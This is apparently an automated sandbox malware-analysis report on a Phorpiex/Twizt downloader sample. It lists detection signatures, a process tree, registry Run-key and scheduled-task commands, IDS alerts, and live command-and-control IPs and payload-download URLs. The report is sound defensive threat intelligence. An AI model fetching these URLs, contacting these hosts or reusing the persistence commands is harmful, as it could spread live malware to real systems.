
Windows Analysis Report
LM94OE0VNK.exe

Overview

General Information

Sample name: LM94OE0VNK.exe
renamed because original name is a hash value
Original sample name: 8ce09f13942ab5bcb81b175996c8385f.exe
Analysis ID: 1564700
MD5: 8ce09f13942ab5bcb81b175996c8385f
SHA1: 6fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd
SHA256: 757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d
Tags: exe, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • LM94OE0VNK.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\LM94OE0VNK.exe" MD5: 8CE09F13942AB5BCB81B175996C8385F)
    • 2374323789.exe (PID: 7544 cmdline: C:\Users\user\AppData\Local\Temp\2374323789.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
      • sysnldcvmr.exe (PID: 7656 cmdline: C:\Windows\sysnldcvmr.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
        • 240016073.exe (PID: 6128 cmdline: C:\Users\user\AppData\Local\Temp\240016073.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
          • cmd.exe (PID: 1452 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 3208 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 3452 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6832 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • 2693731851.exe (PID: 1892 cmdline: C:\Users\user\AppData\Local\Temp\2693731851.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
  • sysnldcvmr.exe (PID: 7964 cmdline: "C:\Windows\sysnldcvmr.exe" MD5: 0C883B1D66AFCE606D9830F48D69D74B)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\sysnldcvmr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\2374323789.exe, ProcessId: 7544, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:18:43.482513+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.10 | 55293 | 90.156.160.6 | 40500 | UDP
2024-11-28T18:18:48.533043+0100 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.10 | 55293 | 80.191.218.209 | 40500 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:18:30.566440+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:33.724115+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:41.727174+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49703 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:44.488388+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49706 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:48.794430+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49711 | 91.202.233.141 | 80 | TCP
2024-11-28T18:18:51.034709+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49712 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:53.558980+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49713 | 185.215.113.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:18:28.772817+0100 | 2856563 | 1 | A Network Trojan was detected | 192.168.2.10 | 55531 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:18:33.724115+0100 | 2853292 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-28T18:18:41.727174+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.10 | 49703 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:44.488388+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.10 | 49706 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:51.034709+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.10 | 49712 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:53.558980+0100 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.10 | 49713 | 185.215.113.66 | 80 | TCP


AV Detection

Source: http://91.202.233.141/gonupll9z | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2C: | Avira URL Cloud: Label: malware
Source: http://91.202.233.141/gonup | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1y | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2IIC: | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/1~ | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/2? | Avira URL Cloud: Label: malware
Source: http://91.202.233.141/gonup8 | Avira URL Cloud: Label: malware
Source: http://91.202.233.141/gonup1 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Windows\sysnldcvmr.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | ReversingLabs: Detection: 75%
Source: C:\Windows\sysnldcvmr.exe | ReversingLabs: Detection: 75%
Source: LM94OE0VNK.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Joe Sandbox ML: detected
Source: C:\Windows\sysnldcvmr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe | Joe Sandbox ML: detected
Source: LM94OE0VNK.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040BE80
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040BE80
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040BE80 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,7_2_0040BE80
Source: LM94OE0VNK.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: LM94OE0VNK.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004066B0
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406570
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004066B0
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406570
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004066B0
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406570

Networking

Source: Network traffic | Suricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.10:55531 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.10:55293 -> 90.156.160.6:40500
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49703 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49706 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.10:55293 -> 80.191.218.209:40500
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49712 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.10:49713 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.10:49702 -> 185.215.113.66:80
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com,3_2_0040AA80
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com,4_2_0040AA80
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040AA80 htons,socket,connect,getsockname, www.update.microsoft.com,7_2_0040AA80
Source: global traffic | TCP traffic: 192.168.2.10:49708 -> 178.22.172.2:40500
Source: global traffic | TCP traffic: 192.168.2.10:49714 -> 217.30.162.161:40500
Source: global traffic | UDP traffic: 192.168.2.10:55293 -> 90.156.160.6:40500
Source: global traffic | UDP traffic: 192.168.2.10:55293 -> 80.191.218.209:40500
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx/1.18.0 (Ubuntu) | Date: Thu, 28 Nov 2024 17:18:30 GMT | Content-Type: application/octet-stream | Content-Length: 80896 | Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT | Connection: keep-alive | ETag: "6733d71b-13c00" | Accept-Ranges: bytes | Data Raw: [raw hex body of the response omitted]
Source: Joe Sandbox View | IP Address: 185.215.113.66
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View | ASN Name: MASTERHOST-ASMoscowRussiaRU
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49703 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49706 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49712 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 91.202.233.141:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49713 -> 185.215.113.66:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49702 -> 185.215.113.66:80
Source: global traffic | HTTP traffic detected: GET /newtpp.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | Host: twizt.net
Source: global traffic | HTTP traffic detected: GET /peinstall.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: twizt.net
Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /gonup HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 185.215.113.66
Source: unknown | TCP traffic detected without corresponding DNS query: 178.22.172.2 (14 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 91.202.233.141 (36 entries)
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1120 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,wsprintfW,DeleteFileW,CloseHandle,wsprintfW,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,rand,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,0_2_009C1120
Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /gonup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global trafficDNS traffic detected: DNS query: twizt.net
Source: 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drString found in binary or memory: http://185.215.113.66/
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1y
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1~
Source: sysnldcvmr.exe, 00000004.00000002.1688593287.00000000021DB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.000000000075B000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2?
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2C:
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2IIC:
Source: 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.dr | String found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
Source: 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.dr | String found in binary or memory: http://91.202.233.141/
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688560492.00000000020D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/gonup
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/gonup1
Source: sysnldcvmr.exe, 00000004.00000002.1690356108.00000000057AD000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/gonup8
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://91.202.233.141/gonupll9z
Source: newtpp[1].exe.0.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: newtpp[1].exe.0.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000085E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/newtpp.exe
Source: LM94OE0VNK.exe | String found in binary or memory: http://twizt.net/newtpp.exeP0
Source: LM94OE0VNK.exe | String found in binary or memory: http://twizt.net/peinstall.php
Source: LM94OE0VNK.exe | String found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpP
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpp
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpvPO
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://twizt.net/peinstall.phpystem32
